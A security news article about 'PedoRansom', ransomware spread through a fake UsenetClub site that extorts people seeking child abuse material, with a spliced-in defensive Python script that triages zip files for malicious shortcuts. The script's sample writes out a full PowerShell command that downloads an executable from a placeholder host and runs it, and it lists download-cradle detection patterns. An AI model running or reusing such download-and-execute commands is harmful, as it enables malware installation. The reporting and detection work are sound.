You seldom sympathize with a cybercriminal, but a new malware campaign targeting child abusers does not stir much sympathy for its victims either.
Since 2012, threat actors have been producing various types of malware and ransomware that pose as government agencies warning infected Windows users that they have been caught with CSAM. The malware urges victims to pay a “fine” to prevent their data from being shared with law enforcement.
One of the first “modern” ransomware operations, known as Anti-Child Pornography Spam Protection (ACCDFISA), combined this blackmail tactic with locking the Windows desktop; later versions went on to encrypt files as well.
Other malware families followed that posed as law enforcement agencies and demanded fines for viewing CSAM, including Harasom, Urausy, and the Reveton trojans.
An unlikely savior
Last week, security researcher MalwareHunterTeam shared with BleepingComputer a sample of a malicious executable dubbed ‘CryptVPN’ [available on VirusTotal] that uses a similar extortion tactic.
This time, however, the victims are not ordinary users: the malware developer is targeting people who actively seek out child pornography.
Through its research, BleepingComputer found that the threat actors built a website impersonating UsenetClub, a subscription service that sells “uncensored” access to images and videos downloadable via Usenet.
Usenet is an online discussion system in which users exchange messages on specialized forums. While it hosts legitimate discussion on a broad range of topics, it is also a well-known source of child pornography.
The threat actors built a fake website posing as UsenetClub that offers three subscription types for accessing the site’s content. The first two are paid subscriptions, priced at $69.99/month and $279.99/year.
The third option, however, promises free access if the visitor installs a free “CryptVPN” program and uses it to reach the site.
Clicking the “Download & Install” button downloads a CryptVPN.zip file to the victim’s system; when unzipped, it contains a Windows shortcut named “CLICK-HERE-TO-INSTALL”.
The shortcut executes PowerShell.exe with commands that download the CryptVPN.exe executable, save it to C:\Windows\Tasks.exe, and then run it.
The executable is packed with UPX; once unpacked, it contains a PDB path showing that the author named the malware “PedoRansom”.
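To show how a defender could triage such a download before it reaches a user, here is an added Python example (not code from the article or from BleepingComputer) that unpacks a zip in memory, identifies Windows shortcut members, and flags any whose embedded command launches PowerShell and writes into C:\Windows\Tasks; the sample zip, the placeholder URL and the download cmdlet names are constructed assumptions.

```python
"""Triage a zip for the lure described above: a .lnk launching PowerShell to fetch an exe into C:\\Windows\\Tasks."""
import io
import re
import zipfile

# MS-SHLLINK header: HeaderSize 0x4C followed by LinkCLSID 00021401-0000-0000-C000-000000000046
LNK_MAGIC = bytes.fromhex("4c000000" "01140200" "00000000" "c000000000000046")

# Indicators taken from the article, plus common download-cradle cmdlets (assumed, not from the article)
INDICATORS = {
    "powershell": re.compile(r"powershell(\.exe)?", re.I),
    "writes_to_windows_tasks": re.compile(r"c:\\windows\\tasks", re.I),
    "download_cradle": re.compile(r"downloadfile|invoke-webrequest|\biwr\b|net\.webclient", re.I),
}

def extract_strings(blob: bytes, min_len: int = 6) -> str:
    """Return printable ASCII and UTF-16LE strings from a binary blob, one per line."""
    ascii_runs = re.findall(rb"[\x20-\x7e]{%d,}" % min_len, blob)
    utf16_runs = re.findall(rb"(?:[\x20-\x7e]\x00){%d,}" % min_len, blob)
    lines = [s.decode("ascii") for s in ascii_runs]
    lines += [s.decode("utf-16-le") for s in utf16_runs]
    return "\n".join(lines)

def triage_zip(zip_bytes: bytes) -> dict:
    """Scan every member of an in-memory zip; shortcut files are string-scanned for the indicators."""
    report = {"members": {}, "suspicious": False}
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        for info in zf.infolist():
            data = zf.read(info)
            is_lnk = data.startswith(LNK_MAGIC) or info.filename.lower().endswith(".lnk")
            hits = []
            if is_lnk:
                text = extract_strings(data)
                hits = [name for name, rx in INDICATORS.items() if rx.search(text)]
            report["members"][info.filename] = {"is_lnk": is_lnk, "indicators": hits}
            # A shortcut that launches PowerShell and writes into C:\Windows\Tasks matches the lure pattern
            if {"powershell", "writes_to_windows_tasks"} <= set(hits):
                report["suspicious"] = True
    return report

def build_sample_zip() -> bytes:
    """Constructed sample (not the real CryptVPN.zip): a fake .lnk body carrying a UTF-16LE PowerShell command."""
    cmd = ('powershell.exe -c "(New-Object Net.WebClient).DownloadFile('
           "'http://example.invalid/CryptVPN.exe','C:\\Windows\\Tasks.exe'); "
           'Start-Process C:\\Windows\\Tasks.exe"')
    lnk = LNK_MAGIC + b"\x00" * 16 + cmd.encode("utf-16-le")
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("CLICK-HERE-TO-INSTALL.lnk", lnk)
        zf.writestr("readme.txt", "benign text file")
    return buf.getvalue()
```

Real shortcut files carry their arguments in UTF-16LE, which is why the string extractor scans both encodings rather than only ASCII.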
C:\Users\user\source\repos\PedoRansom\x64\Release\PedoRansom.pdb
The malware itself has no notable features: it simply changes the victim’s wallpaper to display an extortion demand and drops a ransom note named README.TXT on the desktop that repeats the same threat.
“You have been seeking child exploitation and/or child sexual abuse material. You were ignorant enough to get hacked,” reads the extortion demand.
“We have retrieved all of your information, now you must pay us a ransom or your life is over.”
The note goes on to demand $500, paid to the Bitcoin address bc1q4zfspf0s2gfmuu8h5k0679sxgxjkd7aj5e6qyl within ten days, or the person’s information will be leaked. As of now, the address has received only around $86 in payments.
Threat actors have used “sextortion” tactics for years, typically by mass-emailing large numbers of recipients to coerce them into paying a ransom. The early campaigns proved very effective, earning spammers over $50,000 per week.
Over time, however, as targets grew wiser to these scams, sextortion campaigns stopped yielding the profits they once did. Although this campaign is somewhat more sophisticated and may well frighten those seeking such content, it is highly unlikely that many will pay.